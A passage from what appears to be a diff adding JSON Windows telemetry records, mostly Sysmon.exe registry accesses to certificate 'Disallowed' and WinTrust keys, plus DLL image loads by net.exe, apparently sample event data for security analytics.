"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "winsta.dll", + "image_path": "C:\\Windows\\System32\\winsta.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "ntlanman.dll", + "image_path": "C:\\Windows\\System32\\ntlanman.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "davclnt.dll", + "image_path": "C:\\Windows\\System32\\davclnt.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 